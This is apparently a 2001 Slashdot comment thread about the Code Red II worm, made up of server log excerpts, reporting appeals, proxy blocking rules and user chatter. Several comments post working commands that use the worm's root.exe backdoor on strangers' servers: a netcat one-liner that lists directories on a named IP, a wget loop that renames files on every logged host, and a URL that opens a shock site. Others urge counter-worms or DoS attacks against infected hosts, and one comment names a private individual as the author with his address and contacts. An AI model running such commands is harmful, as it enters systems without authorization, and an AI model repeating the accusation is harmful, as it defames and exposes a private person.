ive gotten quite a few logs from this worm from *apparent* microsoft personal web servers (on 98SE and the like). does anybody know if it can infect this? i thought that pws was a stripped down form of IIS...
Who known, maybe now is the time to buy again some RHAT stock... Indeed, people will need another OS once they've thrown out MShit.
Mail those logs!
From http://dshield.org/codered.html:
As you have probably heard, the Code Red worm has infected over 100,000 machines running Microsoft IIS, and the total is rising. We need to identify the infected machines so that the owners of these machines can be notified so that they can be fixed. We are appealing to DShield submitters to do a special one time only submission for log entries that contains this information.
Linux and other *NIX users Can do this by changing to the directory where your web server logs are located and executing a script like this:
grep 'default.ida?NNNNN' access_log | mail -s 'APACHE' redalert@dshield.org
Carousel is a lie!
Boot Win2k, use CommView - the packets are all similar (approx 64bytes) - still being spammed here, but it's only taking ~2% of my bandwidth...
Ha ha, that was funny! Of course we know worms never infect unix or open source systems !
"And like that
---------- Forwarded message ---------- Date: Sat, 4 Aug 2001 23:00:39 -0600 (MDT) From: Alfred Huger To: incidents@securityfocus.com Subject: Code Red Revision Evening all, I had planned on sending out a thanks this evening to all of the contributors (in terms of logs) who came through on the Code Red (revision 2) surge last week. Regrettably it looks like I will have to wait due to a new variant or rather new worm on the loose. As some of you know a new worm has been released into the wild which uses the same exploit - the Microsoft Indexing Server/Indexing Services ISAPI Buffer Overflow Attack (http://www.securityfocus.com/bid/2880). However, this is most likely not a revision of the initial Code Red worm but a new worm which simply uses uses the same entry point. It carries an actual malicious payload and has a number of other very interesting features. The SecurityFocus ARIS Team and eEye Digital Security will be releasing an in-depth writeup in the next hour or two with technical details as well as information about it's spread to date. As opposed to filling the list with logs of attacks I will reserve the list for discussion of the worm's payload and features - after we post an analysis. So very shortly. Until then, it would be fantastic if you can send your log files to: aris-report@securityfocus.com Because we have caught this very early we plan on starting the notification process tonight. We sent close to 400,000 notifications against Code Red 1 & 2 previously - hopefully because we are on top of this our notifications now will help address the situation much, much faster. If you would like to send offending IP data - Please send it in the following format: IP ADDRESS DATE/TIME Or something similar to this. Please ensure the information is contained to IP address and date per line as we do our notification automatically and our system needs to be to understand the los you send us. We will be posting more shortly. -Al VP Engineering SecurityFocus.com "Vae Victis"
http://www.codewolf.com - Just good stuff to waste time
Very true, very true.
I found a win98 box with it's C drive open for global read/write access on a company LAN, a few weeks ago... uploaded a hello.bmp and made it the desktop wallpaper. Shortly before setting the read-only attributes on hello.bmp and win.ini (stores background information) and adding some lines to autoexec.bat to renew hello.bmp and win.ini every bootup just incase the user managed to change it back.
Wonder what happened to the poor guy when he couldn't figure out how to change the background and had to get the sysadmin in...
May or may not be legal when you look at it that way. I'm pretty sure you can legally break into someone's house if you see flames coming out of the roof. yes but what was said was an anti worm..... which replaces even those not burning yet but those that could be burnt ... firebreakers are legal but only by firefighters sanctioned by the government breaking into a burning house is still robery unless you carry the baby out to safety.. don't mind the mumbleing its getting late here
Apache... you'd have to be running a web server of some kind to be affected at all.
/MC
I've compiled a list of IPs that have made 404 hits on default.ida. Companys like @home and speakeasy (my ISP) need to crack down on IIS users on home DSL networks and get them to install the patch. This many infected hosts is not a good thing.
isomerica.net | Foonetic IRC
Go away Wipo.
Yes, and it would be especially funny if, like Robert T. Morris Jr. before you, you weren't quite as smart as you thought.
This next song is very sad. Please clap along. -- Robin Zander
All this comes at a bad time for Mountain Dew's new fruity flavor, called Code Red, too.
First month it's on the market, and the brand new trademark is sullied by bad references to computer hacking, worms, viruses and international disputes. Is there truly "no bad publicity"?
Of course, like the word 'spam' and the Hormel product SPAM(tm), trademark law rightfully doesn't support serious legal implications, and wouldn't stand a chance against mob inevitability even if it did. Just kinda funny to watch it happen.
[
The ARP storm on @Home let up here in Chicago about 8:45 AM CDT. I would say that I am still seeing an above-average number of ARP who-has packets, but far less frequently now. I can still contact several servers that recently probed me, so I trust they haven't been booted my @Home, but something significant has happened.
Here it is (I did this quite a while ago)
r i=%22 + window.location))
...
g i?url=%22 + window.location))
javascript:void(window.open( %22http://www.netcraft.co.uk/whats/?host=%22 + window.location))
On the same subject, check HTML validity:
javascript:void(window.open( %22http://validator.w3.org/check?uri=%22 + window.location))
... CSS validity...
javascript:void(window.open( %22http://jigsaw.w3.org/css-validator/validator?u
... links
javascript:void(window.open( %22http://www.htmlhelp.com/tools/valet/linktest.c
... bookmarklets are fun!
I'm old enough to remember when discussions on Slashdot were well informed.
absolutely - use Multicast Groups as well.
Why don't you make it Code Red Hat... the worm finds machines infected and then reformats them and installs Redhat. That would take care of the MS infinite bug problem.
Seriously though it should be Microsoft releasing a antidote virus that cleans up all their crappy infected servers. It seems like Microsoft is allowing this to continue because they get a ton of free media coverage... any publicity is good publicity.
My first one was: 63.122.141.50 - - [04/Aug/2001:15:13:17 -0600]
Somehow this is boaring! ... many more boaring discussions.
;^)]
The only thing I read about Code Red II are statistics about the infection rate, how those random generators work, how easy it is to infect a wellknown company's product, that maybe some rootkit gets installed
But all this is selfish. A few days ago, a virus hit us which caused at least a little bit fun. It was this SirCam thing. This virus made it possible to read foreign documents! This was more fun, this was not selfish, this virus hacker let us all participate!
I just wait for the next Code Read worm, which hopefully combines the document sharing code of SirCam with the infection rate of Code Red or maybe it could create web pages with links to such data. Would be really funny to read secret documents of companies. Such a worm will sure cause a rethinking about what products should be used, and what products one should leave in the store.
But as long as those virus hackers are selfish and install rootkits only, we all read just statistics, statistics, technical discussion and all this boaring stuff.
[Of course I do not run those wellknown company's product, I do not even have them installed! Just sitting and waiting for those documents to drop in
It's like it's raining outside, and I didn't notice until I opened the door and looked outside... I didn't know anything was going on till I read slashdot, saw this article, thought "I wonder if any are hitting me" and check my web logs... a voila, there were a few hundred hits from Cr2, coming in every 1-2 minutes. amusing.
Or have it go to goatse.cx. That should convince them to patch their system.
On my OS X Apache box on my desk at work, default.ida is now a copy of http://www.hideaway.net/newsletter/iis_ida_overflo w.txt ...
If I keep getting garbage in my server logs, it may become a 10MB text file of nothing but repetitious copies of the alert... though I'm not sure how much it'd help.
You want it? You got it...
i am a soviet space shuttle
Over four hundred probings from 66.* today. For a while I had a webserver running just to catch these things but now there's just too many. I'm glad my website doesn't have it's own IP address -- when CodeRed scans my site's IP address, it gets the host's main page, not mine.
Liberty in your lifetime
I'm warned that smoking and drinking are bad for my health
Medicines and drugs aren't legal unless they're fully tested and approved
My car doesn't lock up and freeze
My microwave doesn't blue screen and cook my brain inside out.
SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.
WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?
WHY doesn't microsoft NOTIFY me of the risks of using its OS?
I hope no ones bank is trusting microsoft, i hope anyone doing online transactions don't trust microsoft. I hope no one keeps personal, private, confidential and financial data on there pc's.
I hope no one running Windows is on the internet for that matter.
No doubt just some test box someone fired up, but hard to believe that Microsoft wouldn't apply their own security patches to their own boxes:
[Sat Aug 4 18:48:37 2001] [error] [client 207.46.117.98] File does not exist: /home/httpd/html/default.ida
$ whois 207.46.117.98@whois.arin.net
[whois.arin.net]
Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
One Redmond Way
Redmond, WA 98052
US
Netname: MICROSOFT-GLOBAL-NET
Netblock: 207.46.0.0 - 207.46.255.255
Dumb Fucks.
They are now: http://msnbc.com/news/606910.asp
Top Most Bizarre/Disturbing Error Messages
IIS runs on windows NT and 2000. there's no windows directory, it installs in \winnt.
The LocalSystem account has far more than 'pleb' rights -- it's essentially equivilant to Administrator on the file and registry permission level.
They only thing it can't do is talk to MS RPC and SMB services. If the worm can upload something, this restriction could be bypassed.
But what you say about each account having it's own 'desktop' is true. The reason "Allow Service to interact with Desktop" works with SYSTEM is because of it's god-like powers on the local machine.
When I hear the word 'innovation', I reach for my pistol.
Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.
Snipped from incidents dot org (emphasis added)Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.
The editorial accusations of crying wolf might look a little pale this evening...
one better than mcleodeight
echo -e GET /scripts/root.exe?%20/c%20dir%20c:\\ HTTP/1.0\\n | nc -w 1 211.183.77.231 80 | grep -i mp3
I'm an @home customer, and have yet to be hit by this one. One of the above articles said it skips IP's ending in 0, perhaps it skips any IP with a 0 in it. I'm 24.*.0.* Side note, got two V1 attacks today. (120 total)
Apparently the script kiddies are loose and defacing web pages now that there are a couple of backdoors installed for them. Best turn off any scripting in your browser and read up on all of the nasty exploits that can be done by malicious web sites. ALL of the infected web sites should now be considered malicious.
Does the income I've derived from working with Unix belong to SCO?
-- unix is for people without a social life - Patrick van Eijk
1) Put a "warning" screen before code green does anything. IE "Your computer has been infected with the Code Red worm, this program is a patch, and will repair your computer"
2) MS could put a line in the EULA for IIS that says "Microsoft can monitor your computer for viruses, and without warning, remotely apply patches"
Now, 2 I know would be legal, and while 1 is questionable, if it went to court, i speculate that it could easily be defended. (However, IANAL, so if you spend some time in jail, dont blaim me)
The opinions in this post are ficticious. Any similarity to actual opinions, real or imagined, is purely coincidental.
(http://www.cnn.com/2001/TECH/internet/08/01/viru
August 1: CNN tells that virus warnings like this are like "crying wolf"
August 4: New, more virulent, variant of Code Red explodes onto the scene (judging from my Apache logs) and begins to bring parts of the @home network down...
the best virus is "free", "proprietary" and made by "you"
I'm getting rapidly poked here in Indy, connected to Comcast@HOME. They've gone off the net for more than an hour after 22:00 EST the last few nights. I don't know if the outages are from CodeRed I or II, or from @HOME's usaul technical competence.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
Shouldn't we all log on to infected machines, start up MSIE and point it to a web page explaining that the machine is infected and that it should be patched, and then remove root.exe?
It could be done automatically by a few lines of perl code listening to a tail -f of the weblog.
Why don't we all go and email him to let him know how great we think he is.
/.d!
Now not only will his machine be r00ted, but his email account will be
You can accomplish anything you set your mind to. The impossible just takes a little longer.
If this beast is truely wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself it will enter its active phase...
$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 05:51:06 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
Game over man, game over.
I'm gonna make a worm that...
1. Repartitions a Fat32/NTFS partition
2. Makes a Ext2 partition
3. Installs a Linux distribution on the Ext2 partition.
4. Formats Fat32/NTFS partition
5. Writes the boot sector for the new linux installation
6. Reboots.
I am being ARP passthru spammed - is this part of the CodeRed II deal?
It looks like someone has a broken random number generator again.
/16 I'd expect to see more attacks from it, but unless it scans the entire /16 every 5 seconds I think it is a sign of a broken random number generator.
At least, that's the only explanation I can see for the fact that out of 250 attacks I've seen so far, 47 came from the same source IP. Admittedly, it being in the same
Come on guys, if you're going to try to bring down the internet, at least do it right!
Tarsnap: Online backups for the truly paranoid
!!! CODE RED 2 !!!
Steve Gibson of Gibson Research Corporation
Greetings,
As I said in my last warning, the Internet had *NOT* seen the last of the Code Red virus. The threat of a dangerous, Internet-wide infection is dangerous and real, made even worse by Microsoft Windows XP's *built-in* support for RAW SOCKETS.
Microsoft does not understand the *BLANTANTLY OBVIOUS* danger presented by RAW SOCKETS left to the hands of their users. After all, any PERSONAL COMPUTER which utilizes Windows XP (and its EXTREMELY DANGEROUS RAW SOCKETS) will be infected by a Code Red variant sometime in the future! It is *INEVITABLE.*
With the new "features" of Code Red 2, such as the backdoor created by it, any 13 YEAR OLD SCRIPT KIDDIE could take down the entire Internet by starting a random DDoS attack from random IPs to random ports on other random IPs using malicious code similar to that contained in the Code Red virus!!!
***IMAGINE THE CHAOS. THE THREAT IS REAL...***
I REPEAT, THE THREAT IS REAL.
IMAGINE WHAT OTHER VULNERABILITES COULD BE DISCOVERED IN MICROSOFT'S WINDOWS DDoS XP BEFORE RELEASE! WHEN THEY ARE FOUND, EVERYONE KNOWS I'LL BE THERE TO SAY "I TOLD YOU SO!"
Do you like German cars?
DARPA (Defense Advanced Research Projects Agency) has recently awarded SHAI a contract to develop technology to help the US military effectively respond to strategic threats to the computer networks of the United States government. In particular, SHAI will develop tools that can be used to plan courses of action that can counter the threat of widespread, adaptive, coordinated and rapid attacks by exploiting predictive cyberspace knowledge to effectively manipulate the future actions of attackers to the benefit of US cyber defense.
Think a little more next time you try to make someone or something anonymous. Google knows all, and is willing to share.
...on @home for those who run small, low-bandwidth http servers. Most of the attacks on my Apache box have been from the 65.x.x.x subnet belonging to @home. I suspect @home will start scanning for open 80 ports, much as they did with port 119 when @home received the USENET death penalty.
Here in the road runner Class A of 65.x.x.x I've gotten 14 hits on default.ida in the past 20 minutes, so obviously it's spread to Time Warner too, not just @home and speakeasy.
My Linksys was only $99.00, and YES, it is great. From the help page:
Block WAN Request
This feature is designed to prevent users from attacking through the internet. When it is enabled, the router will drop both the unaccepted TCP request and ICMP packets from WAN site. The hacker will not find the router by pinging the WAN IP address.
Setting his threshold to 5, Sparky eliminated most of the trolls on /.
One of my clients is running using a transparent proxy and we have suggested to all our clients to block access to the following hosts:
Since this will not resolve people are suggested to redirect requests for this host to a known real address that resolves to something like 10.254.254.254, and block access to that particular IP address.
The other thing that people should do is place an url_regex looking for the following in the URL:
.*NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN.*
OR:And deny access to those URLs.
With Squid the redirection can be done using a redirector plugin and the blocking using access control lists and the http_access directive. With Inktomi's Traffic Server people should use remap.config to do the remapping and filter.config to do the blocking. Other caching vendors do have similar facilities and people should employ them as and where they can. (IMHO)
Please note: One of our clients using this technique is logging everyone who has caused a scan and is getting in touch with people to let them know they've been compromised. (For obvious reasons - the alternative is to pull the plug on people :-/ )
They have so far blocked in the region of 3.5 million attempted scans of Code Red II in the past 12 hours alone.
Whilst Microsoft may be to blame here, there is affirmative action people in the right places can take, and although our clients have already been informed of how to block it I'm posting here just in case a few people slipped through the net...
No, it doesn't help to move on to something that's less popular and has no root exploits published. I guarantee that it is, in fact, less secure than systems like *BSD, against which security experts spend thousands of hours each week, to ensure the secureness of. If there were 20 root exploits, they would all be in some little-used package, and after the first one was published everyone would know to turn it off by default. After patching it, the next 19 root exploits would be harmless. Because it's open. And people get upset when there's a root exploit, and scramble to fix it. Go over that part of the code with a fine-toothed comb. Not so with Microsoft.
OK, I tried this on a couple of the hosts that I have in my access logfile, but after a few successful attempts it got boring.
I wonder what I can do after getting the prompt? After I get:
c:\inetpub\scripts>
I don't know what to do, but I would like to send an email to the webmaster telling him to stop letting his server sending me crap, however I have tried 'dir' and 'cd' which I thoiught were simple commands, but the link then seems to be stuck, ie. nothing happens.
If anyone has info about what can be done there I'd like to hear.
An email from his own machine by someone else ought to scare him to DO something about it!
I had 127 hits for the "N" Strain, and 402 for the "X" strain so far.
#!/bin/sh /var/log/apache/access.log.0 |awk '{print $1}'`
x e+fire_your_admin.dat'
for address in `cat
do
wget -t 1 'http://'$address'/scripts/root.exe?/c+ren+root.e
done
Not clean nor graceful and it only works if all you accessess come from red alerts, but it works and its quite easy to adjust.
My internet has been slow and choppy since yesterday, and I am an @home cable user. SO this has been around longer then 9:11am EST.
"And your both 6 months pregnant by Billy Ray Sirus" "Then why is mom showing and i'm not?" - Married With Children
post the perl script? I would be very thankful :)
"Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
what do you use to log those attacks? thats very interesting...
#!/bin/bash
# OK: the rationale behind this is that it will lookup the name of each host
# which probes us with the Code Red style probe, and then see whether that
# name resolves back to the number. If it does there's some hope that it's a
# real host, so we'll try to mail webmaster@
log=$HOME/codered.log
for ip in `grep default.ida
awk '{print $1}'`
do
grep "$ip" $log >
if [ $? -ne 0 ]
then # it's not there
echo $ip >> $log # remember so we don't mail them again
host=`dig -x $ip -Aq +nocmd +nostats +noheader +noauthor \
+noaddit | tail -3 | awk '{print $5}' | sed 's/\.$//'`
echo -n "Seen $ip [$host]"
echo $host | grep '^[a-z0-9.-]*$' >
if [ $? -eq 0 ]
then
echo -n "...appears to be valid..."
valid=`nslookup $host | tail -2 | grep '^Address:' |\
awk '{print $2}'`
fi
if [ "$ip" = "$valid" ]
then
mail -s "Your machine appears to be infected by Code Red" \
webmaster@$host <<EOF
Dear Webmaster
We have received a request for 'default.ida' from your server at
$ip. This is usually an indication that you have been
infected by the 'Code Red' or 'Code Red II' worm, currently
attacking Microsoft IIS servers. To secure your server, download
and install the appropriate patch from Microsoft
* Windows NT 4.0:
http://www.microsoft.com/Downloads/Release.asp?Re
* Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?Re
Or, better still, switch to a proper operating system
EOF
echo "
else
echo " ? not valid?"
fi
fi
done
I've been hit by 61 different unique IP's today, of which 17 had IPs which resolved to addresses which resolved to the same IPs. So how many of my mails were actually accepted for delivery?
That's right, none.
I'm old enough to remember when discussions on Slashdot were well informed.
not to mention that if it spreads in the same manner as the original worm it will suck bandwidth just like the worm does.
I highly suspect that Jason Pan (icq# 100915089 email: cooly_jelly@hotmail.com) wrote the Red Code virus. He is a classmate of mine, lives in Taipei, Taiwan, Shihlin District Wen Lin Road. in a really spooky and house. I always remembered him having strange computer equipment and software. He also owns many programming books. A few days ago, he began behaving rather suspiciously. He told me that he was "working on something big" and would possibly affect the whole world. When I asked him for details, he refused to give me any. All I knew was that he was creating some sort of computer program. Being highly fluent and proficient in Win32 and C, I think he is quite capable of writing the virus.
Right now, my server (Apache on Linux, of course) is logging about 80 Code Red/Code Red II requests per hour.
I KNOW I'm right. And if I'm not, I'm STILL right...
The funny thing is, I've been on IRC all day, and after basically turning my cable connection off my Windows firewall software (zonealarm) logged a lot of hits, HTTP in nature from 65.26.*, and 24.* .
I'm a RoadRunner customer, and my ip is 65.26.ha.ha [hostname: gdubyabush.cinci.rr.com], so I thought at first these attacks where from other customers (which it could be) but soon realized most attacks where from RR servers!
I've been hit by their own server 227 times on port 427, which is usually used to probe for services correct? This is just one IP on their network, not the customer network [sorry I'm not going to give ips]. Other IPs, usually one off, are hitting me about 40-50 times.
I noticed this only one other time, and thats when I played around with Apache and proftpd. I guessed then it was because they `noticed' the traffic to and from my port 80 and 21. I only had a few people to log in to test, and my sister to download family pics to test. But those hits slowly stopped.
So we've been hit also. The 24.* is shared by RR customers elsewhere in the country and @home. Although I've not really noticed any slowdowns, these attacks to my pc have ruined a CD I was writing because ZoneAlarm couldn't log them fast enough and the HD just pooped for a second.
Good time to reboot to redhat i guess. And this whole time I thought my ISP was snooping or some software I was using had a backdoor that someone was trying to hit after I closed it.
mIRC bye bye, X-chat, hello again.
Mozilla bye by..ahh.. oh yeah,
Get your Unix fortune now!
I suspect that mainly it's cos 1) this is a pretty UNIX-heavy forum, and 2) grepping logs and such is easier/more common in Unix than in MSLand.
Carousel is a lie!
On a lighter note, Qworst's support # had a 111 minute wait to talk to someone tonight...gotta love it...
No kidding... I started my call at 12:00 and was told there was a 43 minute wait... it's now 2:13 and I just got off the phone with them. The whole conversation took about 5 minutes...
A patch was released months ago.
It's not Bills fault you live in a cave.
Replace "Windows" with "unpatched Bind on Unix", and you have an equally disturbing comment.
+++ATH0
I guess it depends on your choice of apps doesn't it. I use apache, proftpd, djbdns, and qmail (I don't run a news server). As far as I know there was a hack of proftpd in the last couple of years, an apache hack and nothing on qmail or djbdns. So a couple of the apps I sued needed to be updated at least once in the last year. Not too bad if you ask me especially considering apt-get upgrade and apt-get update are so easy to perform. Lucky for me I have literally dozens of high quality open source apps to choose from to run my services. I think I made the right choices by and large.
All in all I would put up the record of my apps against MS suite any day.
War is necrophilia.
Forgiveness is a subject that comes up quite a bit in [worms]. [Worms] are common, and the [worm author] usually wants to be forgiven. But the [cracked box] is usually reluctant to forgive, particularly if the [worm author] hasn't learned anything from the ordeal.
a .html
But if forgiveness is difficult, forgetting can be downright impossible for many [administrators]. How can people be expected to forget some of the most painful experiences of their lives?
I approach the subject of forgiveness from the perspective of someone (me) who believes in forgiveness, but also believes that [worms] should be fair. Since, in many cases, forgiveness is unfair, what should be done? As you will see in my responses to the three letters I've chosen, I support just compensation for some [worm attacks], so I don't always recommend forgiveness. It should be an encouragement to those of you who have been feeling guilty about being unable to forgive and forget. But, at the same time, it should also encourage [worm authors], because the compensation I propose will earn you a terrific reward, and it won't hurt at all.
Courtesy:
http://www.marriagebuilders.com/graphic/mbi5042_q
Begs the question, so we all do this and then once logged in do a "del root.exe" or leave it for the NT admin to clean up...
just write a win2k .bat to install the patch, and write a perl script to telnet in to any IP and use it if possible. It might cause data loss, but if there is no other way to fix sysadmins, it should be done.
They that quote Benjamin Franklin on liberty and safety deserve neither.
$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 05:51:06 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
I noticed that I could not get cell phone service this afternoon (5pm - 7pm approx.). I called customer service several times, they were always busy. I figured they must be having problems with there network. Funny thing is, my friend had the same problem. He has a completely different service provider for his cell phone (I have Cantell AT&T Canada, he has Fido Canada). Could it be that this worm affected cell phone networks?
I work for a company that was using Apache on Solaris and has lots of techies aware of the problems with IIS. The marketing department decided to get the website re-written, and was told by the web design company that this would require running on IIS and ASP. They went ahead with this without consulting our IT dept, who are clueful enough to prefer to stay on Apache.
The IIS setup was reviewed by IT, who found that, sure enough, it was full of holes and missing the latest patches. Fortunately they fixed it before Code Red, but the chances of getting it moved back to Apache are slim, because of the cost of the re-write... Sad but true.
It displays the aformentioned HaX0r!ng.
This won't break Microsoft's back .... consumers voting with their feet can only achieve that end.
Recently I was looking around for a new insurance company. Looking on the web I came across a couple of companies who would give me a quote if I provided them with some personal information. I was all set to deal with one site, whom I won't name, but I decided to first do a quick background check on them. Using netcraft I was able to tell they were running their site on IIS. That little bit of info told me that they weren't at all serious about keeping my personal information confidential.
Of course I decided not to pursue any business with them. But I also went a step further. I wrote them a quick email informing them that I would never do business with a company who was choosing to base their internet business on the most hacked application platform on the internet.
Let companies know that you won't do business with them if they use inferior products. Your quick and simple message to them will speak more loudly than a thousand rants on various message boards.
As a consequence, we get clobbered by all those unpatched machines in east Asia. Since the price of windows office in vietnam in 1998 was US$13 (according to my observations at the time), it's not surprising that everyone in east Asia has windows.
Hopefully, when MS gets serious about those nasty pirates who duplicate their second-rate software for them and make it a de-facto standard in Asia, we'll see these inadequately managed MS machines disappear from Asia and get replace with linux.
Virtually all of the new CR2 probes on my 48 IP addresses are getting clobbered by 203.0.0.0/8 addresses. Note: not /24.
Don't hit the link. Pop-up hell.
so can I sue Microsoft for allowing this to be installed on all their servers and for their use of my apache's server resources?
211.xxx.xxx.xxx - - [05/Aug/2001:02:08:55 -0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
154.xxx.xxx.xxx - - [05/Aug/2001:02:35:30 -0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
A product that is given away and not sold can, I think, have a reliability disclaimer. But as soon as money is exchanged for goods or services you enter into a social contract. Things you buy shouldn't suck.
Wow! I didn't know a command prompt was a GUI!
just do this...
ie renaming root.exe to something less dangerous...
For obvious reasons, the worm is programmed to ignore the 127.0.0.1 netinterface. However, all other interfaces, even 192.168., and 10. are fair game: the reasoning here is that scanning those will allow the worm to infect machines behind NAT routers.
Might I suggest adding | sort -u to the end ;)
Could someone write a nice little apache module that would DOS the IP sending the code red http gets ?? This would be pretty easy to do, and I know I would run it on my apache box !! screw these stupid M$ web servers !! if enough people did this then the infected box's would be DOS'd off the net !! And why dosent any one sue M$ over all these security flaws ? I know that if a company made an unsafe tire tbey get sued.. why not M$ for such awful code ? ok, my rant is over....
automatically generated list of attacks against my server
147 attacks so far
the page is generated through a perl script that reads my apache logs
--
Violators will be prosecuted and prosecutors will be violated.
To see them come in live:
tail -f [log_file] | grep default.ida
To see just CR2, s/default.ida/default.ida\?XXX/
I got three while writing this. I was wondering what was slowing things down tonight.
Some people have a way with words, and some people, um, thingy.
This guy's computer is infected and attacking me every 10 minutes or so. I went to his web page and found this resume which indicates the guy is a Windows2000 expert and Network Technician!
First, see here for how to telnet into the back door left by all CR2 infections. Second, write a script to telnet to all infected hosts which probe you on port 80 and shut down the offending machine. Third, run this script on your web server so that all hosts probing your site get shut down.
If everyone did this, then CR2 would disappear off the net within 24 hours, and we could all rest easy!
I was searching for the XXXX and NNNN stuff all over (altavista, google, msdn, dejanews). Thanks for posting the request, I now know why all these useless lines are showing up in my logs.
I have noticed that Altavista and Google just don't seem to keep up any more. I guess the internet became too big for them. A few years ago I liked using Altavista.
Personally I think it'd be the most hilarious thing anyone could ever do. Modify the worm the use the same IIS backdoor and then have it download and install the patch from Microsoft's site (so everyone can be happy that you're not downloading some trojaned copy). I wouldn't hold it against my neighbor if they came over and locked my car doors at night or rolled up my windows if I forgot to before I went on vacation. It's called being a good samaritan. Somewhere along the line it got twisted into being criminal. So, how about it guys? Can anyone whip something like this up and start injecting it into the net as an antibiotic? :-)
Why the hell would we need default.ida to xploit IIS?
Plus, imagine how much bandwith would be wasted with that.. and more, Apache runs mostly on Linux or other Unix based OS, so CR is not efective against them..
Bad idea.
Exploiting people until they die is more productive.
Isn't there a command to power down an NT box? If so replace the "start+http://sdgawld'woih`~~~whateverblahblahblah " with that command.
orrr... (I think even I may not be evil enough to do this):
http://ADDRESS/scripts/root.exe?+/c+start+http://g oatse.cx
as I understand Code Red can only penetrate IIS on NT or W2000. Wouldn't it be more fitting to say that compromised boxes get ..err.. "Administered"? Just wondering.....
havent been paying attention have you????
Patched systems run fine. Remeber what happens when a Redhat 7.0 systems is connected to the internet? Cracked within 72 hours.
FIRST GODDAMN POST BITCHES! YEAH! SUCK IT! these are the lowercase letters i type to avoid the lameness filter, which does quite a job on improving the signal to noise ratio. how is the price of tea in china these days? probably higher than the price of red hat. supafly, supa dupa fly, supa fly, supa dupa fly.
I tried to post the BUGTRAQ analysis from EEYE, but lameness filter choked on it
Top Most Bizarre/Disturbing Error Messages
Bah, what a waste. Screw that, here are some other things you should do along with your white hat program:
/. stories with one of two comments: "dammit, this is a duplicate! Here is the original at goatse.cx", or "Katz iz 4 t00l!!!1@".
:)
1. Distribute Elcomsoft's e-book reader to all compromised boxes; search for any Adobe e-books and write out a plaintext copy.
2. Append the code to DeCSS to all Word documents on the box.
3. Modify the code to only patch the box when Dmitry is finally released from jail.
4. Install Linux; reboot.
5. Install BSD; reboot.
6. Configure box to DoS MS's IIS patch servers; condemn MS for making patches inaccessible.
7. Script all boxes to respond to
8. Install SETI; add the box to your team; brag about your high score.
Note: these are jokes. Please, please, do not do these things. Especially because if you do, the feds will come knocking on my door.
Woa, finally got this link right. I'm tired..
Considering there are more than twice as many servers using Apache as IIS and the fact that you can get the source for Apache I would say that it is entirely likely that there are as many or more attempts to crack Apache. As a rule however Apache users are much more likely to keep up with patches.
"If there is nothing you are willing to die for, then you are not really alive." Myself
Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.
Welp, I've just tried changing the port to see how that will work (my connection has been up and down like a yo-yo for the past couple of days). Qworst doesn't have the 2.4.2 update available and for some reason Cisco doesn't want to make it available directly to customers.
On a lighter note, Qworst's support # had a 111 minute wait to talk to someone tonight...gotta love it...
I wasn't talking specifically about code red. There are plenty of exploits and outlook viruses that affect Windows98, many of which are fixed with patches. I was trying to point out the flaw in the other guy's argument that regular users need to get themselves a firewall and be security concious. That's a noble ideal, but unlikely to happen given that most computer users (read "Windows users") don't have a damn clue. That was not meant to advocate linux...as my mother-in-law can barely figure out windows, linux would probably be unusable for her. Don't give me "Oh have you seen the newest Gnome?". Read Sun's Gnome usability test. Same applies for KDE. Windows users still have a hard time figuring out Linux. Now go back to first-posting and leave the discussions to non-trolls.
We don't have a state-run media we have a media-run state.
Another way is to NAT the traffic through, possibly to an unused IP - that's what I'm doing on a 677.
I put it through to my webserver though, so I can run all of those nifty little stat scripts...
mortenf
Don't make fun of my speling, english is my 2nd language...
I've been tinkering and I've found that this will help cure the "root exploit":
/scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0
GET
